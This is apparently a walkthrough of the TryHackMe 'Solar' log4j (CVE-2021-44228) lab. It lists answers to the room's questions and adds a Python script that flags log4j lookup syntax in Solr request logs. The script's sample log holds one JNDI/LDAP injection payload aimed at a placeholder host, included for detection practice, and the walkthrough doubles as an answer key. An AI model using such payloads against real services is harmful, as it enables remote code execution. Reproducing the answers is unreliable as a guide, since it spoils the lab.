TryHackMe: Solar, exploiting log4j Walkthrough.
You can access the room through this link: https://tryhackme.com/room/solar
Task 1 CVE-2021-44228 Introduction
In this module you just need to read the content given.
Task 2 Reconnaissance
What service is running on port 8983? (Just the name of the software) → Apache Solr
Task 3 Discovery
Download the attached files
Take a close look at the first page visible when navigating to http://MACHINE_IP:8983. You should be able to see clear indicators that log4j is in use within the application for logging activity. What is the -Dsolr.log.dir argument set to, displayed on the front page? → /var/solr/logs
One file has a significant number of INFO entries showing repeated requests to one specific URL endpoint. Which file contains this repeated entry? (Just the filename itself, no path needed) → solr.log
What “path” or URL endpoint is indicated in these repeated entries? → /admin/cores
Viewing these log entries, what field name indicates some data entrypoint that you as a user could control? (Just the field name) → params
Task 4 Proof of Concept
In this module you just need to read the content given.
Task 5 Exploitation
What is the output of running this command? (You should leave this terminal window open as it will be actively awaiting connections) → Listening on 0.0.0.0:1389
Task 6 Persistence
What user are you? → solr
Task 7 Detection
In this module you just need to read the content given.
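The log review from Task 3 (repeated INFO entries for one endpoint, with the user-controlled params field) and the detection theme of Task 7 can be turned into a small triage script. This is an added example, not part of the room or its attached files: the log lines are constructed in the Solr request-log layout, the host in the flagged entry is a placeholder, and the heuristic (any log4j lookup syntax `${` inside params is suspicious) is my assumption, chosen because legitimate Solr query parameters have no reason to contain it.

```python
import re
from collections import Counter

# Constructed sample lines in the Solr request-log layout (NOT the room's solr.log).
# The host in the third line is a placeholder, not a real indicator.
SAMPLE_LOG = """\
2021-12-10 12:00:01.001 INFO  (qtp1234-18) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={indexInfo=false&wt=json&_=1639137601000} status=0 QTime=1
2021-12-10 12:00:02.002 INFO  (qtp1234-19) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={indexInfo=false&wt=json&_=1639137602000} status=0 QTime=0
2021-12-10 12:00:03.003 INFO  (qtp1234-20) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={foo=${jndi:ldap://PLACEHOLDER_HOST:1389/a}} status=0 QTime=0
2021-12-10 12:00:04.004 INFO  (qtp1234-21) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/metrics params={wt=json} status=0 QTime=2
"""

# Pull the request path and the raw params string out of one HttpSolrCall line.
LINE_RE = re.compile(r"path=(?P<path>\S+) params=\{(?P<params>.*?)\} status=(?P<status>\d+)")
# log4j lookup syntax; flagging the opening token rather than a literal "jndi" string
# also catches the obfuscated variants that Task 8 covers.
LOOKUP_RE = re.compile(r"\$\{")


def parse_line(line):
    """Return {'path', 'params', 'status'} for a request log line, or None."""
    m = LINE_RE.search(line)
    return m.groupdict() if m else None


def endpoint_counts(log_text):
    """Count requests per path, to spot the endpoint hit repeatedly (Task 3)."""
    counts = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            counts[rec["path"]] += 1
    return counts


def suspicious_entries(log_text):
    """Return (line_no, path, params) for entries whose params carry lookup syntax."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        rec = parse_line(line)
        if rec and LOOKUP_RE.search(rec["params"]):
            hits.append((line_no, rec["path"], rec["params"]))
    return hits


if __name__ == "__main__":
    print(endpoint_counts(SAMPLE_LOG).most_common(1))   # [('/admin/cores', 3)]
    for hit in suspicious_entries(SAMPLE_LOG):
        print("suspicious:", hit)
```

Run it against the real /var/solr/logs/solr.log instead of SAMPLE_LOG to reproduce the Task 3 findings on the room's data.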
Task 8 Bypasses
In this module you just need to read the content given.
Task 9 Mitigation
What is the full path of the specific solr.in.sh file? → /etc/default/solr.in.sh
Task 10 Patching
In this module you just need to read the content given.
Task 11 Credits and Author’s Notes
In this module you just need to read the content given.
Note: Always terminate the machine you deployed in this room.
Thanks for reading, I hope you liked it. Post your questions in the comment section below!